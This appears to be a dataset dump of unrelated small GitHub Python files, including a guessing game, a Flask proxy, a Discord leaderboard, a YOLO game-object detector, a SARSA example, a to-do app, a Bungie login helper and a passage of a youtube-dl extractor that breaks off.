have in mind!\\n>> \")\n\n# Forever loop until the player gets the number correct\nwhile foreverLoop_One :\n    # Check if the number is equal to the magic number\n    if int(guessTheNumberInput) == magicNumber :\n        # Each time the player guesses, the count var increments; same goes for the other count += 1\n        count +=1\n        # Check if it is 1 time\n        if int(count) == 1 :\n            print(\"You won in 1 turn only, that’s amazing!\")\n        else :\n            print(\"It took you \" + str(count) + \" turns to guess my number which was \" + str(magicNumber) +\"!\")\n        \n        # Forever loop until the player enters the correct input\n        while playAgainLoop :\n            choiceInput = input(\"Do you want to play again? [Y/N]\\n>> \")\n\n            if choiceInput == \"Y\" :\n                # Resetting the magic number and count variables\n                magicNumber = random.randrange(1,100+1)\n                count = 0\n                guessTheNumberInput = input(\"Well \" + nameInput + \", try to guess the number I have in mind!\\n>> \")\n                \n                # Break from loop\n                break\n            elif choiceInput == \"N\" :\n                print(\"Ok, bye \" + nameInput +\"! See you later!\")\n                exit()\n            else :\n                print(\"Sorry, I did not understand. 
Let me repeat: \")\n\n # Check if the number is greater than the magic number\n elif int(guessTheNumberInput) > magicNumber :\n count +=1\n guessTheNumberInput = input(\"Too high, try again!\\n>> \")\n \n # Check if the number is lesser than the magic number\n elif int(guessTheNumberInput) < magicNumber :\n count +=1\n guessTheNumberInput = input(\"Too low, try again!\\n>> \")","repo_name":"ChrisLegaxy/python-bootcamp","sub_path":"vansenhengmeanrith17/week01/projects/02_magic.py","file_name":"02_magic.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2489290829","text":"from flask import Flask, redirect, url_for, request, render_template, request\nimport requests\n\napp = Flask(__name__)\n\n\n@app.route('/task',methods = ['POST'])\ndef task():\n if request.method == 'POST':\n target = request.form['target']\n array_size = request.form['array_size']\n numbers = request.form['numbers']\n if target == '' or array_size == '' or numbers == '' :\n return \"Please fill all input fields!!\"\n r = requests.post('https://gp-task-algorithm.herokuapp.com/', data={\"n\":array_size, \"t\":target, \"i\":numbers} )\n json_object = r.text\n return json_object\n\n\n\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"Youssef11khaled99/flask-project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16724590604","text":"import discord\nimport sqlite3\n\nconn = sqlite3.connect('db/balances.db')\nconn.execute('CREATE TABLE IF NOT EXISTS balances (user_id INTEGER PRIMARY KEY, balance INTEGER NOT NULL DEFAULT 0)')\n\nasync def leaderboard(ctx, client):\n class DeleteButton(discord.ui.View):\n async def on_timeout(self):\n for child in self.children:\n child.disabled = True\n await self.message.edit(view=self)\n @discord.ui.button(label=\"Delete\",style=discord.ButtonStyle.danger,custom_id=f\"delete_{ctx.message.id}\")\n async def delete(self, interaction: discord.Interaction, button: discord.ui.Button):\n if button.custom_id == f\"delete_{ctx.message.id}\":\n await interaction.response.defer()\n await interaction.message.delete()\n self.stop()\n # Get the balances from the database\n cursor = conn.execute('SELECT user_id, balance FROM balances ORDER BY balance DESC')\n rows = cursor.fetchall()\n\n # Create the leaderboard embed message\n embed = discord.Embed(title=\"Blackjack Leaderboard\", color=0xff0000)\n\n for i, row in enumerate(rows):\n user = client.get_user(row[0])\n name = user.name if user else \"Unknown User\"\n balance = row[1]\n\n embed.add_field(name=f\"{i+1}. 
{name}\", value=f\"{balance} chips\", inline=False)\n\n view = DeleteButton(timeout=10 * 60)\n await ctx.send(embed=embed, view=view)","repo_name":"TheVaxly/ChatBot-Larry-","sub_path":"commands/leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11207952050","text":"import cv2 as cv\nfrom threading import Thread, Lock\n\nimport yolo_v5 as yolo \n\n\nclass Detection:\n\n # ['Tower', 'Canon_Minion', 'caster_minion', 'Melee_Minion', 'Ezreal']\n\n CONF_THRESHOLD = 0.6\n IGNORE_CALSSES = [ 0.0, 4.0]\n\n stopped = True\n lock = None\n rectangles = []\n conf = []\n classes = []\n screenshot = None\n dtc = None\n\n def __init__(self):\n\n self.lock = Lock()\n self.dtc = yolo.detector()\n\n def update(self, screenshot):\n self.lock.acquire()\n self.screenshot = screenshot\n self.lock.release()\n\n def start(self):\n self.stopped = False\n t = Thread(target=self.run)\n t.start()\n\n def stop(self):\n self.stopped = True\n\n def run(self):\n while not self.stopped:\n if not self.screenshot is None:\n\n img = self.dtc.detect(cv.cvtColor(self.screenshot, cv.COLOR_RGB2BGR)).pred[0]\n\n # Get rectangles from prediction\n rectangels = []\n conf = []\n classes = [] \n for b_box in img:\n rect = [b_box[0].item(), b_box[1].item(), b_box[2].item(), b_box[3].item()]\n if b_box[4] > self.CONF_THRESHOLD and b_box[5].item() not in self.IGNORE_CALSSES:\n rectangels.append(rect)\n conf.append(b_box[4].item())\n classes.append(b_box[5].item())\n \n self.lock.acquire()\n self.rectangles = rectangels\n self.conf = conf\n self.classes = classes\n self.lock.release()","repo_name":"fokkinkniels/League_ai","sub_path":"bot/Detection.py","file_name":"Detection.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71968785274","text":"import matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import clone\nfrom sklearn.model_selection import learning_curve\nfrom tqdm import tqdm\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=1, train_sizes=np.linspace(.2, 1.0, 5),\n scoring=\"neg_mean_squared_error\"):\n \"\"\"\n Generate a simple plot of the test and training learning curve.\n\n Parameters\n ----------\n estimator : object type that implements the \"fit\" and \"predict\" methods\n An object of that type which is cloned for each validation.\n\n title : string\n Title for the chart.\n\n X : array-like, shape (n_samples, n_features)\n Training vector, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape (n_samples) or (n_samples, n_features), optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n ylim : tuple, shape (ymin, ymax), optional\n Defines minimum and maximum yvalues plotted.\n\n cv : int, cross-validation generator or an iterable, optional\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n - None, to use the default 3-fold cross-validation,\n - integer, to specify the number of folds.\n - An object to be used as a cross-validation generator.\n - An iterable yielding train/test splits.\n\n For integer/None inputs, if ``y`` is binary or multiclass,\n :class:`StratifiedKFold` used. 
If the estimator is not a classifier\n or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.\n\n Refer :ref:`User Guide <cross_validation>` for the various\n cross-validators that can be used here.\n\n n_jobs : integer, optional\n Number of jobs to run in parallel (default 1).\n \"\"\"\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes, scoring=scoring)\n train_scores_mean = -np.mean(train_scores, axis=1)\n train_scores_std = -np.std(train_scores, axis=1)\n test_scores_mean = -np.mean(test_scores, axis=1)\n test_scores_std = -np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n\n\ndef plot_triple_curve(estimator, title, data, target, X_test, y_test, cv, scoring, outliers, ylim=None,\n n_jobs=1, train_sizes=np.linspace(.2, 1.0, 5)):\n font = {'family' : 'normal',\n # 'weight' : 'bold',\n 'size' : 22}\n\n matplotlib.rc('font', **font)\n fig = plt.figure(figsize=(11,8))\n # plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"relative training set size\")\n plt.ylabel(\"error\")\n train_sizes, train_scores, cv_scores, test_scores = triple_curve(\n estimator, data, target, X_test, y_test, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes, scoring=scoring)\n train_scores_mean = np.mean(train_scores, axis=0)\n train_scores_std = np.std(train_scores, axis=0)\n cv_scores_mean = np.mean(cv_scores, axis=0)\n cv_scores_std = np.std(cv_scores, axis=0)\n test_scores_mean = np.mean(test_scores, axis=0)\n test_scores_std = np.std(test_scores, axis=0)\n\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, cv_scores_mean - cv_scores_std,\n cv_scores_mean + cv_scores_std, alpha=0.1,\n color=\"g\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1,\n color=\"b\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"train\")\n plt.plot(train_sizes, cv_scores_mean, 'o-', color=\"g\",\n label=\"cv\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"b\",\n label=\"test\")\n\n plt.legend(loc=\"best\")\n\n # plt.yscale('log')\n plt.tight_layout()\n return plt\n\n\ndef triple_curve(model, data, target, X_test, y_test, cv, train_sizes, scoring, n_jobs=1, outliers=None):\n test_scores = [[] for i in range(cv.n_splits)]\n train_scores = [[] for i in range(cv.n_splits)]\n cv_scores = [[] for i in range(cv.n_splits)]\n for i, (train_index, test_index) in enumerate(cv.split(data, data[target])):\n size = len(train_index)\n train_chunks_sizes = [int(size * chunk) for chunk in train_sizes]\n data_test = data.loc[test_index].copy()\n data_train = data.loc[train_index].copy()\n X_cv = data_test.drop(target, axis=1)\n y_cv = data_test[target]\n print(i)\n for chunk_size in 
tqdm(train_chunks_sizes):\n data_tmp = data_train.iloc[:chunk_size]\n X_tmp = data_tmp.drop(target, axis=1)\n y_tmp = data_tmp[target]\n model_tmp = clone(model)\n model_tmp.fit(X_tmp, y_tmp)\n print(model_tmp.predict(X_tmp.copy()))\n train_scores[i].append(scoring(y_tmp, model_tmp.predict(X_tmp.copy())))\n cv_scores[i].append(scoring(y_cv, model_tmp.predict(X_cv.copy())))\n test_scores[i].append(scoring(y_test, model_tmp.predict(X_test.copy())))\n print(train_scores[i])\n print(test_scores[i])\n\n return train_sizes, np.array(train_scores), np.array(cv_scores), np.array(test_scores)","repo_name":"jlatko/review_of_preprocessing_methods","sub_path":"diagnostics/learning_curves.py","file_name":"learning_curves.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20562499681","text":"\"\"\"\nSummary:\nSuppose you make 17 16 15 14 13\na spiral like the 18 5 4 3 12\none shown here, 19 6 1 2 11\nstarting with 1 20 7 8 9 10\nand wrapping around. 21 22 23 24 25\n\n3 of the 9 numbers in the diagonals are prime.\nWhat is the minimum amount of layers such that less than\n10 % of the numbers in the diagonals are prime?\n\"\"\"\nimport time\nstart =time.clock()\n\n#primality test good for n < 4,759,123,141\n#see https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test\ndef rabin_miller(n):\n if n in [2,7,61]:\n return True\n if not n % 2:\n return False\n\n def check(a, s, d, n):\n x = pow(a,d,n)\n if x == 1:\n return True\n for i in range(s - 1):\n if x == n - 1:\n return True\n x = pow(x, 2, n)\n return x == n - 1\n\n s = 0\n d = n - 1\n\n while d % 2 == 0:\n d //= 2\n s += 1\n\n for a in (2,7,61):\n if not check(a,s,d,n):\n return False\n return True\n\n\nPRIME_PERCENT = 10\nn = 3\nprime_count = 0 \n\nwhile True:\n for i in (1, 2, 3):\n prime_count += rabin_miller( n*n - i*n + i)\n ratio = (100 * prime_count) / (2*n - 1)\n if ratio < PRIME_PERCENT:\n break\n n += 2\n\nprint(n,time.clock()-start)\n","repo_name":"jasongros619/Project-Euler","sub_path":"51 - 60/Euler 058 Spiral primes.py","file_name":"Euler 058 Spiral primes.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40916363294","text":"'''\nSource codes for PyTorch 1.0 Reinforcement Learning (Packt Publishing)\nChapter 4: Temporal Difference and Q-Learning\nAuthor: Yuxi (Hayden) Liu\n'''\n\nimport torch\n\nfrom windy_gridworld import WindyGridworldEnv\n\nenv = WindyGridworldEnv()\n\n\ndef gen_epsilon_greedy_policy(n_action, epsilon):\n def policy_function(state, Q):\n probs = torch.ones(n_action) * epsilon / n_action\n best_action = torch.argmax(Q[state]).item()\n probs[best_action] += 1.0 - epsilon\n action = torch.multinomial(probs, 1).item()\n return action\n return policy_function\n\n\nfrom collections import defaultdict\n\n\n\ndef sarsa(env, gamma, n_episode, alpha):\n \"\"\"\n Obtain the optimal policy with on-policy SARSA algorithm\n @param env: OpenAI Gym environment\n @param gamma: discount factor\n @param n_episode: number of episodes\n @return: the optimal Q-function, and the optimal policy\n \"\"\"\n n_action = env.action_space.n\n Q = defaultdict(lambda: torch.zeros(n_action))\n for episode in range(n_episode):\n state = env.reset()\n is_done = False\n action = epsilon_greedy_policy(state, Q)\n while not is_done:\n next_state, reward, is_done, info = env.step(action)\n next_action = epsilon_greedy_policy(next_state, 
Q)\n td_delta = reward + gamma * Q[next_state][next_action] - Q[state][action]\n Q[state][action] += alpha * td_delta\n length_episode[episode] += 1\n total_reward_episode[episode] += reward\n if is_done:\n break\n state = next_state\n action = next_action\n policy = {}\n for state, actions in Q.items():\n policy[state] = torch.argmax(actions).item()\n return Q, policy\n\ngamma = 1\n\nn_episode = 500\n\nalpha = 0.4\n\nepsilon = 0.1\n\nepsilon_greedy_policy = gen_epsilon_greedy_policy(env.action_space.n, epsilon)\n\nlength_episode = [0] * n_episode\ntotal_reward_episode = [0] * n_episode\n\noptimal_Q, optimal_policy = sarsa(env, gamma, n_episode, alpha)\n\n\nprint('The optimal policy:\\n', optimal_policy)\n\n\n\n\nimport matplotlib.pyplot as plt\nplt.plot(length_episode)\nplt.title('Episode length over time')\nplt.xlabel('Episode')\nplt.ylabel('Length')\nplt.show()\n\n\nplt.plot(total_reward_episode)\nplt.title('Episode reward over time')\nplt.xlabel('Episode')\nplt.ylabel('Total reward')\nplt.show()\n\n\n","repo_name":"PacktPublishing/PyTorch-1.x-Reinforcement-Learning-Cookbook","sub_path":"Chapter04/chapter4/sarsa.py","file_name":"sarsa.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"95"} +{"seq_id":"44334411791","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import Column, Integer, String, Date, create_engine\nfrom datetime import datetime, timedelta\n\nBase = declarative_base()\n\n\nclass Table(Base):\n __tablename__ = 'task'\n id = Column(Integer, primary_key=True)\n task = Column(String, default='Nothing')\n deadline = Column(Date, default=datetime.now())\n\n def __repr__(self):\n return self.task\n\n\ndef add_task(task, deadline):\n global session\n new_row = Table(task=task, deadline=datetime.strptime(deadline, '%Y-%m-%d'))\n session.add(new_row)\n session.commit()\n print(\"The task has been added!\")\n\n\ndef print_this_day(rows):\n if len(rows) == 0:\n print(\"Nothing to do!\")\n else:\n for i, row in enumerate(rows, start=1):\n print(f\"{i}. {row}\")\n\n\ndef filter_by_date(date):\n rows = session.query(Table).filter(Table.deadline == date.date())\n rows = rows.order_by(Table.deadline).all()\n return rows\n\n\ndef show_all_tasks(period=\"all\"):\n global session\n if period == \"all\":\n rows = session.query(Table).order_by(Table.deadline).all()\n for i, row in enumerate(rows, start=1):\n print(f\"{i}. {row}. 
{row.deadline.strftime('%-d %b')}\")\n return rows\n elif period == \"today\":\n today = datetime.today()\n rows = filter_by_date(today)\n print(f\"Today {today.strftime('%-d %b')}:\")\n print_this_day(rows)\n elif period == \"week\":\n today = datetime.today()\n for i in range(7):\n date = today + timedelta(days=i)\n rows = filter_by_date(date)\n print()\n print(date.strftime(\"%A %-d %b:\"))\n print_this_day(rows)\n\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\nBase.metadata.create_all(engine)\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nwhile True:\n user_input = int(input(\"\"\"1) Today's tasks\n2) Week's tasks\n3) All tasks\n4) Missed tasks\n5) Add task\n6) Delete task\n0) Exit\\n\"\"\"))\n if user_input == 0:\n break\n elif user_input == 1:\n show_all_tasks(\"today\")\n elif user_input == 2:\n show_all_tasks(\"week\")\n elif user_input == 3:\n print(\"All tasks:\")\n show_all_tasks()\n elif user_input == 4:\n print(\"Missed tasks:\")\n outer_rows = session.query(Table).filter(Table.deadline < datetime.today().date())\n outer_rows = outer_rows.order_by(Table.deadline).all()\n if len(outer_rows) == 0:\n print(\"Nothing is missed!\")\n else:\n for j, outer_row in enumerate(outer_rows, start=1):\n print(f\"{j}. {outer_row}. {outer_row.deadline.strftime('%-d %b')}\")\n print()\n elif user_input == 5:\n outer_task = input(\"Enter task\\n\")\n outer_deadline = input(\"Enter deadline\\n\")\n add_task(outer_task, outer_deadline)\n elif user_input == 6:\n print(\"Choose the number of the task you want to delete:\")\n outer_rows = show_all_tasks()\n user_input = int(input())\n session.delete(outer_rows[user_input - 1])\n session.commit()\n print(\"The task has been deleted!\")\n\nprint(\"Bye!\")","repo_name":"homerico/jetbrains_academy_projects","sub_path":"to_do_list/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34703940052","text":"'''\nhttps://www.codewars.com/kata/52f3149496de55aded000410/solutions/python\nWrite a function named sumDigits which takes a number as input and returns the sum of \nthe absolute value of each of the number's decimal digits. \n'''\n\ndef sum_digits(number):\n sum = 0\n number = abs(number)\n while(number > 0):\n sum += number % 10\n number //= 10\n return sum\n\n#test.assert_equals(sum_digits(10), 1)\n#test.assert_equals(sum_digits(99), 18)\n#test.assert_equals(sum_digits(-32), 5)\n\n##A bad solution, that people seem to think is either good practice, or clever:\n#def sumDigits(number):\n# return sum(int(d) for d in str(abs(number)))\n\n#As a once-off, this is okay. 
But converting an integer to a string\n#is an expensive operation compared to simple modding and division.\n\n","repo_name":"matthewzar/CodeWarsKatas","sub_path":"Python/Kyu7/SumOfDigits.py","file_name":"SumOfDigits.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"5640354139","text":"# -*- coding:utf-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom model.GCN import GCN\nimport time\nfrom model.Subgraph import sub_graph_parallel\n\n\nclass MGCN(nn.Module):\n    '''\n    Multi range Gcn\n    Compute GCN over different neighborhood ranges\n    '''\n\n    def __init__(self, L_tilde, dim_in, dim_out, range_K, device, in_drop=0.0,\n                 gcn_drop=0.0, residual=False):\n        '''\n        :param range_K: k ranges\n        :param adj:(V,V)\n        :param V:number of node\n        :param dim_in: int, num of channels in the input sequence\n        :param dim_out: int, num of node channels in the output sequence\n        '''\n        super(MGCN, self).__init__()\n        self.DEVICE = device\n        self.K = range_K\n        self.GCN_khops_node = nn.ModuleList(\n            [GCN(L_tilde, dim_in, dim_out, k + 1, device, in_drop=in_drop, gcn_drop=gcn_drop,\n                 residual=residual) for k in range(self.K)])\n        self.linear = nn.Linear(dim_out, dim_in)\n\n        self.W = nn.Parameter(torch.FloatTensor(dim_in, dim_out))\n        self.b = nn.Parameter(torch.FloatTensor(dim_out, ))\n\n    def forward(self, X):\n        '''\n        Compute GCN over k different neighborhood ranges\n        :param X: (batch_size,N, dim_in)\n        :return: (K,batch_size,N, dim_out)\n        '''\n        Xs = []\n        for k in range(self.K):\n            X = self.GCN_khops_node[k](X)\n            X = self.linear(X)\n            X1 = torch.sigmoid(X.matmul(self.W) + self.b)\n\n            Xs.append(X1)\n        Xs = torch.stack(Xs) # (K,b,V,dim_out)\n        return Xs\n\n\nclass MRA_GCN(nn.Module):\n    '''\n    Compute attention weights over the GCN outputs of different neighborhood ranges\n    '''\n\n    def __init__(self, L_tilde, dim_in, dim_out, range_K, device,\n                 in_drop=0.0, gcn_drop=0.0, residual=False):\n        super(MRA_GCN, self).__init__()\n        self.DEVICE = device\n        self.dim_out = dim_out\n        self.W_a = nn.Parameter(torch.FloatTensor(self.dim_out, self.dim_out))\n        self.U = nn.Parameter(torch.FloatTensor(self.dim_out))\n        self.MGCN = MGCN(L_tilde, dim_in, dim_out, range_K, device, in_drop=in_drop, gcn_drop=gcn_drop,\n                         residual=residual)\n\n    def forward(self, X):\n        '''\n        X:(B,N,dim_in_node)\n        return: h(B,N,dim_out)\n        '''\n        input = self.MGCN(X) # (K,B,N,dim_out)\n        e = torch.einsum('ijkm,m->ijk', torch.einsum('ijkl,lm->ijkm', input, self.W_a),\n                         self.U) # (K,B,N)\n        e = e.permute(1, 2, 0) # (K,B,N)->(B,N,K)\n        alpha = F.softmax(e, dim=-1).unsqueeze(-1)\n        h = torch.einsum('ijkl,ijlm->ijkm', input.permute(1, 2, 3, 0), alpha).squeeze(-1)\n        return h\n\n\nclass MRA_GCN_multitasks(nn.Module):\n    '''\n    Multi-task\n    '''\n\n    def __init__(self, L_tilde_node, dim_in_node, dim_out_node, L_tilde_edge, dim_in_edge, dim_out_edge, range_K,\n                 device,\n                 in_drop=0.0, gcn_drop=0.0, residual=False, share_weight=True):\n        super(MRA_GCN_multitasks, self).__init__()\n        self.DEVICE = device\n        self.share_weight = share_weight\n        self.task_node = MRA_GCN(L_tilde_node, dim_in_node, dim_out_node, range_K, device, in_drop=in_drop,\n                                 gcn_drop=gcn_drop, residual=residual)\n        self.task_edge = MRA_GCN(L_tilde_edge, dim_in_edge, dim_out_edge, range_K, device, in_drop=in_drop,\n                                 gcn_drop=gcn_drop, residual=residual)\n\n        if share_weight:\n            self.linear0 = nn.Linear(dim_out_node, dim_out_edge)\n            self.linear1 = nn.Linear(dim_out_edge, dim_out_node)\n            self.W = nn.Parameter(torch.FloatTensor(dim_out_edge, dim_out_edge)) # shared parameters\n            self.b = nn.Parameter(torch.FloatTensor(dim_out_edge, ))\n\n    def forward(self, X_node, 
X_edge):\n '''\n\n :param X_node: (B,N,dim_in_node)\n :param X_edge: (B,N,dim_in_edge)\n :return:(B,N,dim_out_node),(B,N,dim_out_edge)\n '''\n res_node = self.task_node(X_node)\n res_edge = self.task_edge(X_edge)\n if self.share_weight:\n res_node = self.linear0(res_node).matmul(self.W) + self.b\n res_node = self.linear1(res_node)\n res_edge = res_edge.matmul(self.W) + self.b\n res_node = torch.sigmoid(res_node)\n res_edge = torch.sigmoid(res_edge)\n return res_node, res_edge\n\n\nclass Sub_MAGCN(nn.Module):\n def __init__(self, L_tilde_node, dim_in_node, dim_out_node, adj_sub_edge, L_tilde_edge, dim_in_edge, dim_out_edge,\n range_K, types_accident=None,\n device=None, in_drop=0.0, gcn_drop=0.0, residual=False, share_weight=True):\n super(Sub_MAGCN, self).__init__()\n self.types_accident = types_accident\n self.subgraph = sub_graph_parallel(adj_sub_edge, dim_in_edge, dim_in_edge, device)\n self.MRAGCN = MRA_GCN_multitasks(L_tilde_node, dim_in_node, dim_out_node, L_tilde_edge, dim_in_edge,\n dim_out_edge,\n range_K, device, in_drop=in_drop, gcn_drop=gcn_drop, residual=residual,\n share_weight=share_weight)\n if types_accident is not None:\n self.W_subgraphs = nn.Parameter(torch.FloatTensor(types_accident, dim_in_edge, dim_in_edge))\n self.linear = nn.Linear(dim_in_edge * 2, dim_in_edge)\n\n def forward(self, X_node, X_edge, X_sub_edge, accident=None):\n '''\n\n :param X_node: (B,N,dim_in_node)\n :param X_edge: (B,N,dim_in_edge)\n :param X_sub_edge:(B,N,N_sub,dim_in_edge)\n :param types_accident: (B,N,1)\n :return: (B,N,dim_out_node),(B,N,dim_out_edge)\n '''\n if self.types_accident is not None:\n # start0 = time.time()\n res_sub = self.subgraph(X_sub_edge, accident, self.W_subgraphs)\n X_edge_cat = torch.cat((X_edge, res_sub), dim=-1)\n X_edge = self.linear(X_edge_cat)\n # print('sub=', time.time() - start0)\n # start1 = time.time()\n res_node, res_edge = self.MRAGCN(X_node, X_edge)\n # print('margcn=', time.time() - start1)\n return res_node, res_edge\n\n\nclass Sub_pred(nn.Module):\n def __init__(self, L_tilde_node, dim_in_node, dim_out_node, adj_sub_edge, L_tilde_edge, dim_in_edge, dim_out_edge,\n range_K, types_accident=None,\n device=None, in_drop=0.0, gcn_drop=0.0, residual=False, share_weight=True):\n super(Sub_pred, self).__init__()\n self.types_accident = types_accident\n self.subgraph = sub_graph_parallel(adj_sub_edge, dim_in_edge, dim_in_edge, device)\n self.linear_node = nn.Linear(dim_in_node, dim_out_node)\n self.linear_edge = nn.Linear(dim_in_edge, dim_out_edge)\n if types_accident is not None:\n self.W_subgraphs = nn.Parameter(torch.FloatTensor(types_accident, dim_in_edge, dim_in_edge))\n self.linear = nn.Linear(dim_in_edge * 2, dim_in_edge)\n\n def forward(self, X_node, X_edge, X_sub_edge, accident=None):\n '''\n\n :param X_node: (B,N,dim_in_node)\n :param X_edge: (B,N,dim_in_edge)\n :param X_sub_edge:(B,N,N_sub,dim_in_edge)\n :param types_accident: (B,N,1)\n :return: (B,N,dim_out_node),(B,N,dim_out_edge)\n '''\n if self.types_accident is not None:\n # start0 = time.time()\n res_sub = self.subgraph(X_sub_edge, accident, self.W_subgraphs)\n X_edge_cat = torch.cat((X_edge, res_sub), dim=-1)\n X_edge = self.linear(X_edge_cat)\n # print('sub=', time.time() - start0)\n # start1 = time.time()\n res_node = self.linear_node(X_node)\n res_edge = self.linear_edge(X_edge)\n # print('margcn=', time.time() - start1)\n return res_node, 
res_edge\n","repo_name":"wumingyao/MADGCN","sub_path":"model/Sub_MAGCN.py","file_name":"Sub_MAGCN.py","file_ext":"py","file_size_in_byte":7818,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"41814236875","text":"import cookielib\nimport urllib\nimport urllib2\n\n\ntry:\n API_KEY = open('bungie.key').read().strip()\nexcept:\n logging.exception('Unable to read API Key from \"bungie.key\" (see '\n 'https://www.bungie.net/en/Clan/Post/39966/85087279/0/0):')\n API_KEY = ''\n\n\ndef Auth(username, password):\n bungie_url = 'https://www.bungie.net/en/User/SignIn/Psnid'\n psn_url = 'https://auth.api.sonyentertainmentnetwork.com/login.do'\n\n jar = cookielib.CookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))\n\n req = urllib2.Request(bungie_url)\n conn = opener.open(req)\n _ = conn.read()\n\n req = urllib2.Request(\n psn_url, data=urllib.urlencode({'j_username': username, 'j_password': password}))\n conn = opener.open(req)\n _ = conn.read()\n\n return (jar._cookies['www.bungie.net']['/']['bungled'].value,\n jar._cookies['www.bungie.net']['/']['bungleatk'].value)\n\n\ndef BuildOpener(bungled, bungleatk):\n opener = urllib2.build_opener()\n jar = cookielib.CookieJar()\n jar.set_cookie(BungieCookie('bungled', bungled))\n jar.set_cookie(BungieCookie('bungleatk', bungleatk))\n opener.add_handler(urllib2.HTTPCookieProcessor(jar))\n opener.extra_headers = {'x-api-key': API_KEY, 'x-csrf': bungled}\n opener.add_handler(HeaderAdder(opener.extra_headers))\n return opener\n\n\ndef BungieCookie(name, value):\n return cookielib.Cookie(\n version=0, name=name, value=value, port=None, port_specified=False, domain='www.bungie.net',\n domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True,\n expires=None, discard=False, comment=None, comment_url=None, rest={'HttpOnly': None},\n rfc2109=False)\n\n\nclass HeaderAdder(urllib2.BaseHandler):\n def __init__(self, headers):\n self.headers = headers\n\n def https_request(self, req):\n for k, v in self.headers.iteritems():\n req.add_header(k, v)\n return req\n","repo_name":"nmlorg/destiny","sub_path":"base/bungie/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8689670971","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nimport json\nimport re\n\nfrom .common import InfoExtractor\nfrom ..compat import compat_HTTPError\nfrom ..utils import (\n ExtractorError,\n int_or_none,\n str_or_none,\n try_get,\n)\n\n\nclass ImgGamingBaseIE(InfoExtractor):\n _API_BASE = 'https://dce-frontoffice.imggaming.com/api/v2/'\n _API_KEY = '857a1e5d-e35e-4fdf-805b-a87b6f8364bf'\n _HEADERS = None\n _MANIFEST_HEADERS = {'Accept-Encoding': 'identity'}\n _REALM = None\n _VALID_URL_TEMPL = r'https?://(?P<domain>%s)/(?P<type>live|playlist|video)/(?P<id>\\d+)(?:\\?.*?\\bplaylistId=(?P<playlist_id>\\d+))?'\n\n def _real_initialize(self):\n self._HEADERS = {\n 'Realm': 'dce.' 
